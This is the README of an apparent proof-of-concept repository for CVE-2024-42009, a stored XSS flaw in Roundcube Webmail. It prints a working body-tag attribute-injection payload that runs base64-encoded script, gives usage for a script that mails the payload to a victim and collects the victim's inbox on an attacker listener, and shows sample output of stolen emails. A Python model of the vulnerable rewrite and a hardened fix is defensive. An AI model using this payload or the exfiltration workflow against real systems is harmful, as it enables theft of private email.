
CVE-2024-42009 PoC — Roundcube Webmail Security Vulnerability

Associated Vulnerability
Title: Roundcube Webmail Security Vulnerability (CVE-2024-42009)
Description: Roundcube Webmail is a browser-based open-source IMAP client that supports address book management, message search, spell checking and more. Roundcube Webmail 1.5.7 and earlier, and 1.6.x versions before 1.6.8, contain a cross-site scripting vulnerability; a remote attacker can steal and send the victim's emails through a crafted email message.

Description: CVE-2024-42009 Proof of Concept

Readme
# CVE-2024-42009 PoC: Email Capture Listener & XSS Exploit in Roundcube Webmail

## Overview

This repository contains a proof-of-concept (PoC) exploit for **CVE-2024-42009**, a stored Cross-Site Scripting (XSS) vulnerability in Roundcube Webmail 1.6.7 and the other affected versions (through 1.5.7, and 1.6.x through 1.6.7). The exploit shows how an attacker can place malicious JavaScript in an email message and abuse a desanitization issue in the rendering of the message's HTML: the sanitizer's output is rewritten afterwards in a way that reintroduces attacker-controlled attributes. In this example the injected script exfiltrates email content from the victim's inbox, but the same primitive lets the attacker run arbitrary script in the victim's webmail session.

## Vulnerability Details

### CVE Description

A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.

### XSS Payload Explanation (for this example)

The exploit uses a CSS animation trigger for XSS execution:

```html
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=eval(atob('BASE64_PAYLOAD')) foo=bar">
```

When Roundcube renders the message inline it replaces the sanitized `<body>` element with a `<div>` and carries the body's attributes over as one raw string, after stripping attributes such as `bgcolor` with a replacement that does not respect attribute boundaries. Placing `bgcolor=foo` inside the `title` value makes that stripping also consume the closing quote of `title`, so the rest of the `name` value is re-parsed as separate attributes: `style` and `onanimationstart` land on the `<div>` even though the sanitizer never allowed them, and the trailing `foo=bar` absorbs the now-unbalanced quote so it does not break the handler. `progress-bar-stripes` is a keyframe animation already defined in Roundcube's skin CSS, so the animation starts as soon as the element is rendered and `onanimationstart` fires without any user interaction; `eval(atob(...))` lets a script of any length be carried in a single attribute value that contains no whitespace. For the full analysis of where the vulnerable code sits in Roundcube, read [this article](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/#desanitization-in-inline-email-rendering-cve202442009).
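To make the desanitization concrete, the following added example (not code from this repository or from Roundcube) models the body-to-div rewrite in Python. `vulnerable_body_to_div` is a simplified, assumed reconstruction of the regex-based rewrite described above, `hardened_body_to_div` does the same job on tokenized attributes with a whitelist and re-escaping, and `tag_attributes` shows what a browser-like tokenizer sees on the resulting `<div>`. The sample message bodies are constructed here and use `alert(origin)` in place of the `eval(atob(...))` handler so the effect is visible without a browser.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs: the README's attribute-injection payload with a
# harmless handler, and a benign body that legitimately uses bgcolor.
SAMPLE_BODY = (
    '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes '
    'onanimationstart=alert(origin) foo=bar"><p>hello</p></body>'
)
BENIGN_BODY = '<body bgcolor="#ffffff"><p>hello</p></body>'

BODY_TAG_RE = re.compile(r'<body([^>]*)>', re.I)
# Assumed shape of the bgcolor stripping: it operates on the raw attribute
# string and cannot tell which quote belongs to which attribute.
BGCOLOR_RE = re.compile(r'bgcolor=["\']*([a-z0-9#]+)["\']*', re.I)
ALLOWED_BODY_ATTRS = ('title', 'dir', 'lang')  # whitelist chosen for this example


class _FirstTag(HTMLParser):
    """Collect the attribute list of the first start tag with a given name."""

    def __init__(self, wanted):
        super().__init__()
        self.wanted = wanted
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == self.wanted and self.attrs is None:
            self.attrs = attrs


def tag_attributes(html_text, tag):
    """[(name, value), ...] of the first <tag>, as an HTML tokenizer sees it
    (names lower-cased, duplicates kept, value None for valueless attributes)."""
    p = _FirstTag(tag)
    p.feed(html_text)
    p.close()
    return p.attrs or []


def vulnerable_body_to_div(body_html):
    """Model of the pre-1.6.8 behaviour (an assumption, not Roundcube's code):
    bgcolor is cut out of the raw attribute string and the leftover string is
    pasted verbatim onto the replacement <div>."""
    m = BODY_TAG_RE.search(body_html)
    if not m:
        return body_html
    attrs = m.group(1)
    style = ''
    mb = BGCOLOR_RE.search(attrs)
    if mb:
        style = ' style="background-color: %s"' % mb.group(1)
        attrs = BGCOLOR_RE.sub('', attrs)  # also eats the quote that closed title="..."
    div = '<div class="rcmBody"' + style + attrs + '>'
    return body_html[:m.start()] + div + body_html[m.end():].replace('</body>', '</div>')


def hardened_body_to_div(body_html):
    """Same transformation on tokenized attributes: bgcolor is validated and
    moved into style, only whitelisted attributes survive, values are escaped."""
    m = BODY_TAG_RE.search(body_html)
    if not m:
        return body_html
    kept = []
    for name, value in tag_attributes(m.group(0), 'body'):
        if name == 'bgcolor' and value and re.fullmatch(r'[a-z0-9#]+', value, re.I):
            kept.append(' style="background-color: %s"' % value)
        elif name in ALLOWED_BODY_ATTRS and value is not None:
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
    div = '<div class="rcmBody"' + ''.join(kept) + '>'
    return body_html[:m.start()] + div + body_html[m.end():].replace('</body>', '</div>')


def event_handlers(rendered_html):
    """Sorted names of on* event-handler attributes that ended up on the <div>."""
    return sorted({n for n, _ in tag_attributes(rendered_html, 'div') if n.startswith('on')})


if __name__ == '__main__':
    for label, fn in (('vulnerable', vulnerable_body_to_div), ('hardened', hardened_body_to_div)):
        out = fn(SAMPLE_BODY)
        print(label, '->', out)
        print('  div attributes:', tag_attributes(out, 'div'))
        print('  event handlers:', event_handlers(out))
```

Running the script shows the vulnerable rewrite producing a `<div>` whose tokenized attributes include `style=animation-name:progress-bar-stripes` and `onanimationstart=alert(origin)`, while the hardened rewrite keeps only `class` and an escaped `title` and still handles the benign `bgcolor` case identically.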

### Scope

- This exploit was tested only on Roundcube Webmail version 1.6.7
- The victim must open the message; the payload runs when the message body is rendered
- May fail if a Content Security Policy (CSP) that blocks inline event handlers or `eval` is deployed

## Usage

### Dependencies

Install required Python packages:

```bash
python3 -m venv venv
. venv/bin/activate
python3 -m pip install -r requirements.txt
```

### Command Line Arguments

```bash
python3 exploit.py -u <TARGET_URL> -r <RECIPIENT_EMAIL> -l <LISTENER_HOST> -p <LISTENER_PORT>
```

- **Target URL**: the endpoint that accepts the message; in this case a contact form that forwards submissions by email to the recipient (e.g., `http://email.company.local/contact`)
- **Recipient email**: valid email address of the victim; the malicious message is delivered to this mailbox
- **Listener host**: IP address of the attacker-controlled HTTP listener; it must be reachable from the victim's browser, since the injected script sends the captured emails there
- **Listener port**: available port for the HTTP server (e.g., 4444)

### Example Usage

```bash
python3 exploit.py -u http://webmail.target.com/contact -r admin@target.com -l 192.168.1.100 -p 4444
```

### Expected Output

```
[*] Crafting payload for http://webmail.target.com/contact with recipient admin@target.com
[*] Sending payload to http://webmail.target.com/contact with recipient admin@target.com  
[*] Starting HTTP server on port 4444
[+] HTTP server listening on port 4444
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[+] Received 3 emails!

------------------------------------------------------------
📧 EMAIL UID: 1  
------------------------------------------------------------
From: john.doe@company.com
Subject: Quarterly Report
Message:
Please find attached the quarterly financial report...
------------------------------------------------------------

[+] Email exfiltration complete! Shutting down server...
[+] Server stopped successfully!
```

## References

### Vulnerability Research
- [SonarSource Blog: Government Emails at Risk - Critical Cross-Site Scripting Vulnerability in Roundcube Webmail](https://www.sonarsource.com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/)
- [SonarSource Demonstration Video](https://www.youtube.com/watch?v=X7UX7b7Tkrk)

## Legal Disclaimer

⚠️ **IMPORTANT**: This proof-of-concept is provided for **educational and authorized testing purposes only**. Use it responsibly; the author is not responsible for any damage done by others.
File Snapshot

```
/data/pocs/09b8748d9f5a72166abb5497df528382386477f9
├── exploit.py (9.1K)
├── README.md (3.9K)
└── requirements.txt (605 bytes)

0 directories, 3 files
```
Shenlong Bot has cached this for you